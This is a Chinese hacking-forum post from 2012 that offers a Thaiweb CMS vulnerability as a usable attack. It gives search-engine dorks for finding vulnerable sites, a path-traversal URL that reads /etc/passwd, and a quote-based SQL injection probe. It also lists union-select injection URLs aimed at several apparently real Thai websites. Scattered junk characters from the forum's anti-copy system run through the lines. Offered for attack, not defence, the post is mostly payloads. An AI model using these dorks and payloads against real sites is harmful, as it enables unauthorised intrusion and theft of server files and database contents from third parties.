找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1959|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
# K. C+ w, e9 p. V; M; O8 |
+ M+ o8 k* Y( y( Lintext:powered by Thaiweb. [9 Q, }0 f, o+ S4 Y( h7 p

% H( p- F) L% e( {& y! _inurl:index.php?page=board.php: r1 A& w& N7 {6 y* W' G+ I# ~2 Z

' D7 @+ }) j( ~1 F6 {3 V  ]$ { 0 d: r8 I/ N1 S- t, u/ O8 q$ B
1 T+ M1 A& R9 S5 q/ U
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd7 y: H9 |0 ~8 S
& O" k* Y. S6 v/ e; f, h; @' N
6 J9 o+ `3 _% y* t, G
/ y4 {; K6 Q/ W4 j
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'- _2 v9 M7 A1 e# w4 H6 k$ u
( p+ Z1 H" T' L* y
0 W  G% w5 K9 S: h) B  d

( f9 e. n( B- Y9 F' }( m% h! \( phttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--3 P/ {: F9 p. Y! [# z' `; Z

+ E  f( @0 Y# t. O/ Q$ C' vhttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
  q4 o: L" R' T' |' w5 ?, a- O 5 N3 Y2 c5 m9 `4 z* {7 W
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--0 m/ x9 k7 R5 j; [& y- c" @7 t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表